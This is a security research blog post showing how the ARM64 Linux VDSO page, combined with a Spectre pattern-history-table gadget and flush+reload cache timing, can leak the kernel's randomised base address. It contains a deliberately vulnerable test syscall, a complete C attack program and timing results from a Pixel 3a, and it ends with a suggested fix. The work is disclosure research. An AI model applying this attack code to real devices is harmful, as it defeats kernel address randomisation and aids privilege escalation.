VDSO As A Potential KASLR Oracle

Post by Philip Pettersson and Alex Radocea

Introduction

The VDSO region can serve as a potential oracle to bypass KASLR with speculative sidechannels. This post covers what the VDSO region is, KASLR, and an example gadget to exploit the sidechannel. We show some experimental timing results and a suggested fix.

Table of Contents

What is VDSO

The "VDSO" ("virtual dynamic shared object") is a special region of the kernel that is mapped into all userland processes. The userland virtual address of the VDSO region will differ in each process, but they all point to the same physical page of memory.

This region was created to address the problem of syscall overhead. While this overhead has been improved in recent decades from the traditional "int 0x80" on 32-bit x86, there is still invariably an overhead cost associated with calling a system call on any Linux platform.

This overhead can become a problem for small system calls that get called repeatedly in tight loops. If the kernel code of the system call is very short, the overhead will naturally be a larger share of total execution time. This includes system calls that only return a simple kernel data value.

To solve this issue, the VDSO contains special vdso-versions of system calls which fit these criteria. As of writing, these system calls are all related to timing measurements (arm64/x86):

clock_gettime()
gettimeofday()
clock_getres()
time()

Since these are all simple data-fetcher type functions that are commonly used in loops, the Linux kernel defines vdso-versions of these system calls which do not traverse the user-kernel boundary. They accomplish this by mapping a vdso code page into each userland process, as well as a vdso data page called vvar. These pages are all copy-on-write mappings that point to the global kernel pages.

When a userland program wants to call clock_gettime() for example, libc will know that a vdso version of the system call exists and will jump to it in the special vdso code page. This function will then simply inspect the vdso data page for the correct value and return it, just like the kernel code would - but without crossing the kernel boundary and incurring the overhead.

On ARM64 the code page is called vdso and points to the kernel page vdso_start which is located in the kernel TEXT region. The data page is called vvar and points to the kernel page vdso_data.

arch/arm64/kernel/vdso.c

    /* Populate the special mapping structures */
    mappings->data_mapping = (struct vm_special_mapping) {
        .name   = "[vvar]",
        .pages  = &vdso_pagelist[0],
    };

    mappings->code_mapping = (struct vm_special_mapping) {
        .name   = "[vdso]",
        .pages  = &vdso_pagelist[1],
    };

Linux KASLR

KASLR ("Kernel Address Space Layout Randomization") is a Linux security feature that ensures that the kernel is located at different addresses on each boot. This helps complicate the exploitation of many types of memory corruption vulnerabilities since an attacker can't immediately know the location of data structures they want to change, or functions they want to call. Linux on ARM64 has had KASLR support since version 4.6.

It implements the functionality by randomizing the virtual address start of the kernel TEXT and module regions. Some kernels additionally place the physical memory location of the kernel at a random starting address.

If an attacker can leak the virtual address of a kernel function at runtime, the secret randomization value that was used at boot can easily be deduced given a copy of the kernel image.

As an example, let's examine the runtime address of vdso_start on a Pixel 3 running Android 10:

sargo:/ # echo 0 > /proc/sys/kernel/kptr_restrict
sargo:/ # grep vdso_start /proc/kallsyms
ffffff8a83a01000 R vdso_start

We can compare this with the raw offset for vdso_start, which we can extract from the firmware image using gdb:

% ~/android-ndk-r21b/prebuilt/darwin-x86_64/bin/gdb ./vmlinux
GNU gdb (GDB) 8.3
...
(gdb) p vdso_start
$1 = {<text variable, no debug info>} 0xffffff8009c01000 <vdso_start>
(gdb) p _text
$2 = {<text variable, no debug info>} 0xffffff8008080000 <_text>

The offset of vdso_start in the kernel TEXT is 0x1b81000:

>>> hex(0xffffff8009c01000 - 0xffffff8008080000)
'0x1b81000L'

Now we can calculate the randomized start of the runtime kernel, by simply subtracting the known offset from the runtime virtual address of vdso_start.

>>> hex(0xffffff8a83a01000 - 0x1b81000)
'0xffffff8a81e80000L'

sargo:/ # grep 'T _text' /proc/kallsyms
ffffff8a81e80000 T _text

Therefore, if we can leak the virtual address of vdso_start we can bypass KASLR.

Speculative Sidechannels

In 2016 Lipp, et al. published ARMageddon. This paper covers ARM cache sidechannel attacks in detail and covers techniques such as Prime+Probe, Flush+Reload, and Evict+Reload on ARM. In January 2018, Spectre and Meltdown were announced. These papers demonstrate how to exploit speculative execution, sometimes in concert with cache timing sidechannels, to disclose memory contents across privilege boundaries or leak the address space layout.

Speculative execution is a performance technique which concurrently executes future instructions, whether or not they may actually execute. If they do actually execute, then the results are good to keep. If they don't however, then the instructions are retired and any memory/register side effects are reverted and ignored.

In terms of security, any side effects that are not reverted can lead to bypasses: for example the disclosure of privileged memory from an unprivileged process. Some side effects, like cache memory updates, were a substantial surprise to the public security industry, though not CPU designers, when Spectre came out. The cache sidechannels can potentially be mitigated with speculative memory barriers that prevent out-of-order execution. Other side effects, like differences in timing due to microarchitectural implementation flaws, can not be avoided or reverted without firmware or cpu fixes though.

As a result of meltdown, the linux kernel has implemented KPTI. To defend against Spectre on ARM, several kernel mitigations are in place. The variant groups have the following key mitigations:

  • Variant 1 -- data speculation barriers have been implemented across critical user-kernel boundaries.

  • Variant 2 -- instruction cache invalidation is performed around context switches and additional firmware-level mitgations to harden branch predictors have been created

  • Variant 3 - KPTI for meltdown

  • Variant 4 SSBS/SSBD mitigations in firmware to disable out of order memory loads and stores at boot time or per process.

Several projects have implemented proof of concepts for these vulnerabilities. Some of the best are Safeside and IAIK's transientfail. The transient.fail website delivers an excellent dichomoty of the main known speculative variants.

A particularly simple Spectre variant abuses the Pattern History Table which optimizes loops. For example, given a nested loop with a conditional which dereferences memory, the PHT logic would not be able to inform speculative execution to stop early. This can lead to speculative out of bounds array access, which has cache side effects.

PHT Speculative Execution Example

    void *vdso = (void *) getauxval(AT_SYSINFO_EHDR);
    unsigned char *parray[2048];
    char *data = "data string";
    int *Memory;
    int N = 1024;

    for(int i = 0; i < N; i++) {
        parray[i] = data;
    }
    for(int i = N; i < sizeof(parray)/sizeof(parray[0]); i++) {
        parray[i] = vdso;
    }

    *Memory = N;

    flush_t(vdso); //clear out vdso from the cache

    char x;


    // SPEC EXEC CODE STARTS HERE
    for (int outer = 0; ; outer++) {
        for(int inner = 0; inner < *Memory; inner++) {

                //a speculative memory barrier would block this attack
                //mbarrier() ;


                //speculative execution from the PHT dereferences inner +1, inner+2, etc
                x = parray[inner][0];

                //time access to vdso then invalidate it from cache
                delta = flush_reload_t(vdso);

                        if (delta < CACHE_MISS_THRESHOLD*0.7) {
                    printf("hit: %zd\n", delta);
                }

                //use x to avoid being optimized out by the compiler
                if (x == 0xfe) {
                    printf("this is unexpected\n");
                }
        }
    }

Surprisingly, the vdso pointer ends up being read and stored in cache due to speculative execution going out of bounds. Measuring the cache using flush+reload demonstrates it readily across linux ARM devices.

Cache Timing Primitives

The ARM cache architecture is implementor dependent and has several key differences than say intel. This slidedeck has some good pointers. The following list is helpful to understand how ARM may be different than other cpus

  • A split instruction and data cache at L1
  • An instruction cache which is typically virtually indexed at L1, but a data cache that is physically indexed from L1 and above
  • Subsequently a point of unification for the split caches at L2 or L3
  • Shareability attributes dictating whether coherencey happens across cores or which subset of cores.
  • "Clean" writes dirty data back, meaning pushes data out towards the point of coherency.
  • A clean typically happens upon eviction but can also happen directly with cpu instructions, some of which are unprivileged on ARMv8. This was not possible on ARMv7
  • "Invalidate" empties lines of cache
  • Attributes exist for how write backs happen

Very critically to this article, data memory reads from two distinct virtual addresses which reference the same exact physical address would be handled at the same cache lines at each level of physically indexed cache. And for performance, physically indexed caches are not flushed across a context switch from EL0 to EL1 or EL1 to EL0.

This leads to a key attack primitive. Across exception levels, a lower exception level can measure cache access to determine if a higher exception level accessed the same physical memory.

In the case of the VDSO, we have pages of memory with a .text kernel virtual address, which get mapped into userland processes. Using Flush+Reload it is possible to measure a kernel system call (or other process) accessing VDSO memory as follows:

  1. At EL0 run instructions to clean/invalidate a data cache line in the VDSO with the userland address
  2. Context switch into EL1 and Run a system call which accesses VDSO memory via the kernel virtual address
  3. Context switch back into EL0 when the system call returns
  4. Time the memory access to VDSO memory via the userland address.

Combining this concept with Spectre -- if a system call might speculatively access virtual memory addresses injected by userland, then it becomes possible to create a KASLR oracle. Userland abuses the vulnerable system call with various KASLR guesses and then measure the results.

Example Vulnerable Syscall

Real world gadgets depend on the emitted instructions maintaining the memory dereference in the inner loop, which is critical for mistraining the Pattern History Table optimization into executing array indexing out of bounds. Additionally, a real world gadget requires control of which pointer will be dereferenced, for example by controlling pointers on a heap chunk boundary.

To demonstrate this attack across the boundary consider the following test system call. For simplicity, this routine is compiled without any optimization.

__attribute__((optnone))
asmlinkage long sys_spectre_test(unsigned long inBuf, unsigned long inLen, unsigned long outerLen, unsigned long __user *ret_p)
{
        int i, j;
        int ret = 0;
        struct spectre_data data;

        if (inLen > sizeof(data)) {
          return -EINVAL;
        }

        copy_from_user(&data, (void * __user)inBuf, inLen);

        if (data.len > 128) {
          return -EPERM;
        }

        for (i = 0; i < data.len; i++) {
                data.values[i] = (char *)&ret;
        }

          //every value past data.len is initialized by userland
        //Speculative execution due to PHT misprediction will see inner>=data.len being dereferenced and stored in cache.

        for (j = 0; j < outerLen; j++) {
          for (i = 0; i < data.len; i++) {
            ret += ((char *)data.values[i])[0] + j;
          }
        }

        *ret_p = ret;

        return 0;
}

Attack Implementation

#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/auxv.h>
#include <sys/syscall.h>

//From https://github.com/IAIK/transientfail/tree/master/pocs/libcache
#include "../../../libcache/cacheutils.h"

struct spectre_struct {
    int len;
    void* values[128];
};

int main(int argc, const char **argv) {
    struct spectre_struct data;

    void *vdso = (void *) getauxval(AT_SYSINFO_EHDR);
    pagesize = sysconf(_SC_PAGESIZE);

    if(!CACHE_MISS)
        CACHE_MISS = detect_flush_reload_threshold();
    printf("Flush+Reload Threshold: %zu\n", CACHE_MISS);

    unsigned long j = 0;
    uint64_t delta, mini = 20000;

    //from testing -- vdso + 4096 + 1024 does not collide with data access when a new process is created
    //so it avoids false positives

    int roll_offset = 4096 + 1024;
    void *vdso_target =  (void *)vdso + roll_offset;

    data.len = 7;

    for (int i = 0; i < sizeof(data.values)/sizeof(data.values[0]); i++) {

        //NOTE -- update with the real vdso_start, or the guess
        data.values[i] = (void *)strtoull(argv[1], NULL, 0) + roll_offset;
    }

    flush(vdso_target);

    for (;;) {
        j++;

        //jump into kernel for spec exec
        syscall(297, &data, sizeof(data), 8192);

        delta = flush_reload_t(vdso_target);

         if (delta < mini) {
            mini =  delta;
            printf("%zd %s\n", mini, mini < (CACHE_MISS*0.8) ? "*" : "");
              if ( mini < (CACHE_MISS*0.8) ) exit(0);
         }

    }

    return (0);
}

Results

Tests were run on a pixel 3a. This features a Snapdragon 670.

1|sargo:/ $ cat /proc/cpuinfo
Processor   : AArch64 Processor rev 12 (aarch64)
processor   : 0
BogoMIPS    : 38.00
Features    : fp asimd evtstrm aes pmull sha1 sha2 crc32 atomics fphp asimdhp
CPU implementer : 0x51
CPU architecture: 8
CPU variant : 0x7
CPU part    : 0x803
CPU revision    : 12

processor   : 1
BogoMIPS    : 38.00
Features    : fp asimd evtstrm aes pmull sha1 sha2 crc32 atomics fphp asimdhp
CPU implementer : 0x51
CPU architecture: 8
CPU variant : 0x7
CPU part    : 0x803
CPU revision    : 12

processor   : 2
BogoMIPS    : 38.00
Features    : fp asimd evtstrm aes pmull sha1 sha2 crc32 atomics fphp asimdhp
CPU implementer : 0x51
CPU architecture: 8
CPU variant : 0x7
CPU part    : 0x803
CPU revision    : 12

processor   : 3
BogoMIPS    : 38.00
Features    : fp asimd evtstrm aes pmull sha1 sha2 crc32 atomics fphp asimdhp
CPU implementer : 0x51
CPU architecture: 8
CPU variant : 0x7
CPU part    : 0x803
CPU revision    : 12

processor   : 4
BogoMIPS    : 38.00
Features    : fp asimd evtstrm aes pmull sha1 sha2 crc32 atomics fphp asimdhp
CPU implementer : 0x51
CPU architecture: 8
CPU variant : 0x7
CPU part    : 0x803
CPU revision    : 12

processor   : 5
BogoMIPS    : 38.00
Features    : fp asimd evtstrm aes pmull sha1 sha2 crc32 atomics fphp asimdhp
CPU implementer : 0x51
CPU architecture: 8
CPU variant : 0x7
CPU part    : 0x803
CPU revision    : 12

processor   : 6
BogoMIPS    : 38.00
Features    : fp asimd evtstrm aes pmull sha1 sha2 crc32 atomics fphp asimdhp
CPU implementer : 0x51
CPU architecture: 8
CPU variant : 0x6
CPU part    : 0x802
CPU revision    : 13

processor   : 7
BogoMIPS    : 38.00
Features    : fp asimd evtstrm aes pmull sha1 sha2 crc32 atomics fphp asimdhp
CPU implementer : 0x51
CPU architecture: 8
CPU variant : 0x6
CPU part    : 0x802
CPU revision    : 13

Hardware    : Qualcomm Technologies, Inc SDM670


# With a correct guess
$ grep vdso_start /proc/kallsyms
ffffff846c601000 R vdso_start


time ./experiment 0xffffff846c601000

Flush+Reload Threshold: 217
521
417
313
156 *
1m37.23s real     0m03.31s user     0m27.01s system


# With a wrong guess

time ./experiment 0xffffff946c601000

Flush+Reload Threshold: 217
521
417
313
260
^c

A Suggested Fix

A fix is relatively simple. Linux can randomize the VDSO pages independently from the rest of the kernel code and data, where leaking VDSO's virtual address has no security impact.